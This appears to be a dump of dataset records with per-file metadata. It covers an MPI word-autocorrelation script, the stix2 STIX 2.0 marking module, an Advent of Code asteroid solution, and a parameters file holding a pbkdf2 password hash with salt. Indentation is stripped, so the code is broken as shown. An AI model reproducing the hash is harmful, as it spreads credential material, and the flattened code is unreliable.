Remove delimiters, split lines into words and remove whitespaces,
and make lowercase. Return list of all words in the text.
"""
clean_text = []
for line in text:
for purge in DELIMITERS:
line = line.replace(purge, " ")
words = line.split()
for word in words:
word = word.lower().strip()
clean_text.append(word)
return clean_text
def word_acf(word, text, timesteps):
"""
Calculate word-autocorrelation function for given word
in a text. Each word in the text corresponds to one "timestep".
"""
acf = np.zeros((timesteps,))
mask = [w==word for w in text]
nwords_chosen = np.sum(mask)
nwords_total = len(text)
for t in range(timesteps):
for i in range(1,nwords_total-t):
acf[t] += mask[i]*mask[i+t]
acf[t] /= nwords_chosen
return acf
def ave_word_acf(words, text, timesteps=100):
"""
Calculate an average word-autocorrelation function
for a list of words in a text.
"""
acf = np.zeros((len(words), timesteps))
for n, word in enumerate(words):
acf[n, :] = word_acf(word, text, timesteps)
return np.average(acf, axis=0)
def ave_word_acf_p2p(comm, my_words, text, timesteps=100):
rank = comm.Get_rank()
n_ranks = comm.Get_size()
# each rank computes its own set of acfs
my_acfs = np.zeros((len(my_words), timesteps))
for i, word in enumerate(my_words):
my_acfs[i,:] = word_acf(word, text, timesteps)
if rank == 0:
results = []
# append own results
results.append(my_acfs)
# receive data from other ranks and append to results
for sender in range(1, n_ranks):
results.append(comm.recv(source=sender, tag=12))
# compute total
acf_tot = np.zeros((timesteps,))
for i in range(n_ranks):
for j in range(len(results[i])):
acf_tot += results[i][j]
return acf_tot
else:
# send data
comm.send(my_acfs, dest=0, tag=12)
def ave_word_acf_gather(comm, my_words, text, timesteps=100):
rank = comm.Get_rank()
n_ranks = comm.Get_size()
# each rank computes its own set of acfs
my_acfs = np.zeros((len(my_words), timesteps))
for i, word in enumerate(my_words):
my_acfs[i,:] = word_acf(word, text, timesteps)
# gather results on rank 0
results = comm.gather(my_acfs, root=0)
# loop over ranks and results. result is a list of lists of ACFs
if rank == 0:
acf_tot = np.zeros((timesteps,))
for i in range(n_ranks):
for j in range(len(results[i])):
acf_tot += results[i][j]
return acf_tot
def setup(book, wc_book, nwords = 16):
# load book text and preprocess it
text = load_text(book)
clean_text = preprocess_text(text)
# load precomputed word counts and select top words
word_count = load_word_counts(wc_book)
top_words = [w[0] for w in word_count[:nwords]]
return clean_text, top_words
def mpi_acf(book, wc_book, nwords = 16, timesteps = 100):
# initialize MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
n_ranks = comm.Get_size()
# load book text and preprocess it
clean_text, top_words = setup(book, wc_book, nwords)
# distribute words among MPI tasks
count = nwords // n_ranks
remainder = nwords % n_ranks
# first 'remainder' ranks get 'count + 1' tasks each
if rank < remainder:
first = rank * (count + 1)
last = first + count + 1
# remaining 'nwords - remainder' ranks get 'count' task each
else:
first = rank * count + remainder
last = first + count
# each rank gets unique words
my_words = top_words[first:last]
print(f"My rank number is {rank} and first, last = {first}, {last}")
# use collective function
acf_tot = ave_word_acf_gather(comm, my_words, clean_text, timesteps)
# use p2p function
#acf_tot = ave_word_acf_p2p(comm, my_words, clean_text, timesteps)
# only rank 0 has the averaged data
if rank == 0:
return acf_tot / nwords
if __name__ == '__main__':
# load book text and preprocess it
book = sys.argv[1]
wc_book = sys.argv[2]
filename = sys.argv[3]
acf = mpi_acf(book, wc_book, 16, 100)
rank = MPI.COMM_WORLD.Get_rank()
if rank == 0:
nsteps = len(acf)
output = np.vstack((np.arange(1,nsteps+1), acf)).T
np.savetxt(filename, output, delimiter=',')
| 32.013605
| 72
| 0.624522
|
acff911f212218a5e29506367a0c1bd745837ca1
| 7,981
|
py
|
Python
|
stix2/v20/common.py
|
maybe-sybr/cti-python-stix2
|
e9d417de2592c0c7367c312ca0fd25dc8f8a9818
|
[
"BSD-3-Clause"
] | 1
|
2021-06-23T09:44:17.000Z
|
2021-06-23T09:44:17.000Z
|
stix2/v20/common.py
|
maybe-sybr/cti-python-stix2
|
e9d417de2592c0c7367c312ca0fd25dc8f8a9818
|
[
"BSD-3-Clause"
] | null | null | null |
stix2/v20/common.py
|
maybe-sybr/cti-python-stix2
|
e9d417de2592c0c7367c312ca0fd25dc8f8a9818
|
[
"BSD-3-Clause"
] | null | null | null |
"""STIX 2.0 Common Data Types and Properties."""
from collections import OrderedDict
import copy
from ..custom import _custom_marking_builder
from ..markings import _MarkingsMixin
from ..markings.utils import check_tlp_marking
from ..properties import (
HashesProperty, IDProperty, ListProperty, Property, ReferenceProperty,
SelectorProperty, StringProperty, TimestampProperty, TypeProperty,
)
from ..utils import NOW, _get_dict
from .base import _STIXBase20
from .vocab import HASHING_ALGORITHM
def _should_set_millisecond(cr, marking_type):
# TLP instances in the 2.0 spec have millisecond precision unlike other markings
if marking_type == TLPMarking:
return True
# otherwise, precision is kept from how it was given
if isinstance(cr, str):
if '.' in cr:
return True
else:
return False
if cr.precision == 'millisecond':
return True
return False
class ExternalReference(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709261>`__.
"""
_properties = OrderedDict([
('source_name', StringProperty(required=True)),
('description', StringProperty()),
('url', StringProperty()),
('hashes', HashesProperty(HASHING_ALGORITHM, spec_version='2.0')),
('external_id', StringProperty()),
])
def _check_object_constraints(self):
super(ExternalReference, self)._check_object_constraints()
self._check_at_least_one_property(['description', 'external_id', 'url'])
class KillChainPhase(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709267>`__.
"""
_properties = OrderedDict([
('kill_chain_name', StringProperty(required=True)),
('phase_name', StringProperty(required=True)),
])
class GranularMarking(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709290>`__.
"""
_properties = OrderedDict([
('marking_ref', ReferenceProperty(valid_types='marking-definition', spec_version='2.0', required=True)),
('selectors', ListProperty(SelectorProperty, required=True)),
])
class TLPMarking(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709287>`__.
"""
# TODO: don't allow the creation of any other TLPMarkings than the ones below
_type = 'tlp'
_properties = OrderedDict([
('tlp', StringProperty(required=True)),
])
class StatementMarking(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709286>`__.
"""
_type = 'statement'
_properties = OrderedDict([
('statement', StringProperty(required=True)),
])
def __init__(self, statement=None, **kwargs):
# Allow statement as positional args.
if statement and not kwargs.get('statement'):
kwargs['statement'] = statement
super(StatementMarking, self).__init__(**kwargs)
class MarkingProperty(Property):
"""Represent the marking objects in the ``definition`` property of
marking-definition objects.
"""
def clean(self, value, allow_custom=False):
if type(value) in OBJ_MAP_MARKING.values():
return value, False
else:
raise ValueError("must be a Statement, TLP Marking or a registered marking.")
class MarkingDefinition(_STIXBase20, _MarkingsMixin):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709284>`__.
"""
_type = 'marking-definition'
_properties = OrderedDict([
('type', TypeProperty(_type, spec_version='2.0')),
('id', IDProperty(_type, spec_version='2.0')),
('created_by_ref', ReferenceProperty(valid_types='identity', spec_version='2.0')),
('created', TimestampProperty(default=lambda: NOW)),
('definition_type', StringProperty(required=True)),
('definition', MarkingProperty(required=True)),
('external_references', ListProperty(ExternalReference)),
('object_marking_refs', ListProperty(ReferenceProperty(valid_types='marking-definition', spec_version='2.0'))),
('granular_markings', ListProperty(GranularMarking)),
])
def __init__(self, **kwargs):
if set(('definition_type', 'definition')).issubset(kwargs.keys()):
# Create correct marking type object
try:
marking_type = OBJ_MAP_MARKING[kwargs['definition_type']]
except KeyError:
raise ValueError("definition_type must be a valid marking type")
if 'created' in kwargs:
if _should_set_millisecond(kwargs['created'], marking_type):
self._properties = copy.deepcopy(self._properties)
self._properties.update([
('created', TimestampProperty(default=lambda: NOW, precision='millisecond')),
])
if not isinstance(kwargs['definition'], marking_type):
defn = _get_dict(kwargs['definition'])
kwargs['definition'] = marking_type(**defn)
super(MarkingDefinition, self).__init__(**kwargs)
def _check_object_constraints(self):
super(MarkingDefinition, self)._check_object_constraints()
check_tlp_marking(self, '2.0')
def serialize(self, pretty=False, include_optional_defaults=False, **kwargs):
check_tlp_marking(self, '2.0')
return super(MarkingDefinition, self).serialize(pretty, include_optional_defaults, **kwargs)
OBJ_MAP_MARKING = {
'tlp': TLPMarking,
'statement': StatementMarking,
}
def CustomMarking(type='x-custom-marking', properties=None):
"""Custom STIX Marking decorator.
Example:
>>> from stix2 import CustomMarking
>>> from stix2.properties import IntegerProperty, StringProperty
>>> @CustomMarking('x-custom-marking', [
... ('property1', StringProperty(required=True)),
... ('property2', IntegerProperty()),
... ])
... class MyNewMarkingObjectType():
... pass
"""
def wrapper(cls):
return _custom_marking_builder(cls, type, properties, '2.0', _STIXBase20)
return wrapper
# TODO: don't allow the creation of any other TLPMarkings than the ones below
TLP_WHITE = MarkingDefinition(
id='marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='white'),
)
TLP_GREEN = MarkingDefinition(
id='marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='green'),
)
TLP_AMBER = MarkingDefinition(
id='marking-definition--f88d31f6-486f-44da-b317-01333bde0b82',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='amber'),
)
TLP_RED = MarkingDefinition(
id='marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='red'),
)
| 36.778802
| 149
| 0.677609
|
acff915344dd3b64dafcb47e057a363f4e6c29b9
| 3,622
|
py
|
Python
|
2019/day10.py
|
gcalmettes/AdventOfCode2017
|
374347c981b603981b7d0b21dad3fc594b126c82
|
[
"MIT"
] | 1
|
2021-12-12T22:59:49.000Z
|
2021-12-12T22:59:49.000Z
|
2019/day10.py
|
gcalmettes/AdventOfCode2017
|
374347c981b603981b7d0b21dad3fc594b126c82
|
[
"MIT"
] | null | null | null |
2019/day10.py
|
gcalmettes/AdventOfCode2017
|
374347c981b603981b7d0b21dad3fc594b126c82
|
[
"MIT"
] | 1
|
2019-12-03T05:37:49.000Z
|
2019-12-03T05:37:49.000Z
|
from typing import List, Dict, NamedTuple, Tuple, Iterator
import math
from collections import defaultdict
class Asteroid(NamedTuple):
x: int
y: int
Asteroids = List[Asteroid]
def parse(raw: str) -> Asteroids:
return [
Asteroid(x, y)
for y, line in enumerate(raw.strip().split("\n"))
for x, c in enumerate(line)
if c == '#'
]
def count_visible(asteroids: Asteroids, station: Asteroid) -> int:
# recenter
slopes = set()
for x, y in asteroids:
dx = x - station.x
dy = y - station.y
gcd = math.gcd(dx, dy)
if dx == dy == 0:
pass
else:
slopes.add((dx / gcd, dy / gcd))
return len(slopes)
def best_station(asteroids: Asteroids) -> Tuple[Asteroid, int]:
results = [(a, count_visible(asteroids, a)) for a in asteroids]
return max(results, key=lambda pair: pair[1])
RAW = """.#..#
.....
#####
....#
...##"""
ASTEROIDS = parse(RAW)
assert best_station(ASTEROIDS) == (Asteroid(3, 4), 8)
A2 = parse("""......#.#.
#..#.#....
..#######.
.#.#.###..
.#..#.....
..#....#.#
#..#....#.
.##.#..###
##...#..#.
.#....####""")
assert best_station(A2) == (Asteroid(5, 8), 33)
A3 = parse(""".#..##.###...#######
##.############..##.
.#.######.########.#
.###.#######.####.#.
#####.##.#.##.###.##
..#####..#.#########
####################
#.####....###.#.#.##
##.#################
#####.##.###..####..
..######..##.#######
####.##.####...##..#
.#####..#.######.###
##...#.##########...
#.##########.#######
.####.#.###.###.#.##
....##.##.###..#####
.#.#.###########.###
#.#.#.#####.####.###
###.##.####.##.#..##""")
assert best_station(A3) == (Asteroid(11, 13), 210)
def faux_angle(asteroid):
dx, dy = asteroid
if dx == 0 and dy < 0:
# e.g. (0, -1), straight up
return (0, 0)
elif dx > 0 and dy < 0:
# e.g. (0.1, -0.9) or (0.9, -0.1)
return (1, dx / abs(dy))
elif dx > 0 and dy == 0:
return (2, 0)
elif dx > 0 and dy > 0:
# e.g. (0.9, 0.1) or (0.1, 0.9)
return (3, dy / dx)
elif dx == 0 and dy > 0:
return (4, 0)
elif dx < 0 and dy > 0:
# e.g. (-0.1, 0.9) or (-0.9, 0.1)
return (5, abs(dx) / dy)
elif dx < 0 and dy == 0:
return (6, 0)
elif dx < 0 and dy < 0:
# e.g. (-0.9, -0.1) or (-0.1, -0.9)
return (7, dy / dx)
def iterate(asteroids: Asteroids, station: Asteroid) -> Iterator[Asteroid]:
asteroids_by_angle = defaultdict(list)
for x, y in asteroids:
dx = x - station.x
dy = y - station.y
gcd = math.gcd(dx, dy)
if dx == dy == 0:
pass
else:
angle = (dx / gcd, dy / gcd)
asteroids_by_angle[angle].append(Asteroid(x, y))
# sort by length descending for each angle
for angle_asteroids in asteroids_by_angle.values():
angle_asteroids.sort(key=lambda a: abs(a.x - station.x) + abs(a.y - station.y), reverse=True)
while asteroids_by_angle:
keys = asteroids_by_angle.keys() # (dx, dy)
keys = sorted(keys, key=faux_angle)
for key in keys:
angle_asteroids = asteroids_by_angle[key]
yield angle_asteroids.pop()
if not angle_asteroids:
del asteroids_by_angle[key]
with open('day10_input.txt') as f:
asteroids = parse(f.read().strip())
part1 = best_station(asteroids)[1]
print(f'part 1: {part1}')
station = best_station(asteroids)[0]
vaporizations = list(iterate(asteroids, station))
part2 = vaporizations[199].x * 100 + vaporizations[199].y
print(f'part 2: {part2}')
| 24.146667
| 101
| 0.47598
|
acff916c9c13ec45d8705a7c78687da27d11f532
| 92
|
py
|
Python
|
parameters_8560.py
|
ksuhr1/CMPS183-hw3
|
d0450827912b7ec355a9e433c0c7e33d1b2610a0
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8560.py
|
ksuhr1/CMPS183-hw3
|
d0450827912b7ec355a9e433c0c7e33d1b2610a0
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8560.py
|
ksuhr1/CMPS183-hw3
|
d0450827912b7ec355a9e433c0c7e33d1b2610a0
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$b24904a15adb4514$85f395bc9c1f6be8227d9f7540e54127cd4f0fdf"
| 46
| 91
| 0.891304
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.